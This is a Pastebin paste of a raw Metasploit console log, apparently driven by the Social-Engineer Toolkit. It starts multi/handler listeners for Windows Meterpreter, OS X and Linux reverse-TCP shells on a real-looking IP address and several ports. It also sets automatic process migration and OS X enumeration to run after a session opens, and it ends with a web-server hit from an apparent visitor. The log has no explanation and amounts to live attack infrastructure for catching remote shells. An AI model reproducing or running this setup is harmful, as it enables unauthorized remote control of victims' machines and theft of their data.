Guest User

Untitled

a guest
Oct 19th, 2018
106
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.16 KB | None | 0 0
  1. =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
  2. + -- --=[ 943 exploits - 504 auxiliary - 152 post
  3. + -- --=[ 251 payloads - 28 encoders - 8 nops
  4. =[ svn r15823 updated today (2012.09.05)
  5.  
  6. [*] Processing /home/dan/src/set/src/program_junk/meta_config for ERB directives.
  7. resource (/home/dan/src/set/src/program_junk/meta_config)> use exploit/multi/handler
  8. resource (/home/dan/src/set/src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
  9. PAYLOAD => windows/meterpreter/reverse_tcp
  10. resource (/home/dan/src/set/src/program_junk/meta_config)> set LHOST 0.0.0.0
  11. LHOST => 0.0.0.0
  12. resource (/home/dan/src/set/src/program_junk/meta_config)> set LPORT 6665
  13. LPORT => 6665
  14. resource (/home/dan/src/set/src/program_junk/meta_config)> set ExitOnSession false
  15. ExitOnSession => false
  16. resource (/home/dan/src/set/src/program_junk/meta_config)> set AutoRunScript migrate -f
  17. AutoRunScript => migrate -f
  18. resource (/home/dan/src/set/src/program_junk/meta_config)> exploit -j
  19. [*] Exploit running as background job.
  20. resource (/home/dan/src/set/src/program_junk/meta_config)> use exploit/multi/handler
  21. resource (/home/dan/src/set/src/program_junk/meta_config)> set PAYLOAD osx/x86/shell_reverse_tcp
  22. PAYLOAD => osx/x86/shell_reverse_tcp
  23. resource (/home/dan/src/set/src/program_junk/meta_config)> set LHOST 173.66.94.104
  24. LHOST => 173.66.94.104
  25. resource (/home/dan/src/set/src/program_junk/meta_config)> set LPORT 6661
  26. [*] Started reverse handler on 0.0.0.0:6665
  27. LPORT => 6661
  28. resource (/home/dan/src/set/src/program_junk/meta_config)> set InitialAutoRunScript post/osx/gather/enum_osx
  29. InitialAutoRunScript => post/osx/gather/enum_osx
  30. [*] Starting the payload handler...
  31. resource (/home/dan/src/set/src/program_junk/meta_config)> set ExitOnSession false
  32. ExitOnSession => false
  33. resource (/home/dan/src/set/src/program_junk/meta_config)> exploit -j
  34. [*] Exploit running as background job.
  35. resource (/home/dan/src/set/src/program_junk/meta_config)> use exploit/multi/handler
  36. resource (/home/dan/src/set/src/program_junk/meta_config)> set PAYLOAD linux/x86/shell/reverse_tcp
  37. PAYLOAD => linux/x86/shell/reverse_tcp
  38. resource (/home/dan/src/set/src/program_junk/meta_config)> set LHOST 173.66.94.104
  39. LHOST => 173.66.94.104
  40. resource (/home/dan/src/set/src/program_junk/meta_config)> set LPORT 6662
  41. LPORT => 6662
  42. [-] Handler failed to bind to 173.66.94.104:6661
  43. resource (/home/dan/src/set/src/program_junk/meta_config)> set ExitOnSession false
  44. [*] Started reverse handler on 0.0.0.0:6661
  45. ExitOnSession => false
  46. resource (/home/dan/src/set/src/program_junk/meta_config)> exploit -j
  47. [*] Starting the payload handler...
  48. [*] Exploit running as background job.
  49. msf exploit(handler) >
  50. [-] Handler failed to bind to 173.66.94.104:6662
  51. [*] Started reverse handler on 0.0.0.0:6662
  52. [*] Starting the payload handler...
  53. ?-?-?-?.hlrn.qwest.net - - [06/Sep/2012 23:37:54] "GET / HTTP/1.1" 200 -
  54. ----------------------------------------
  55. Exception happened during processing of request from ('?.?.?.?', 12942)
Add Comment
Please, Sign In to add comment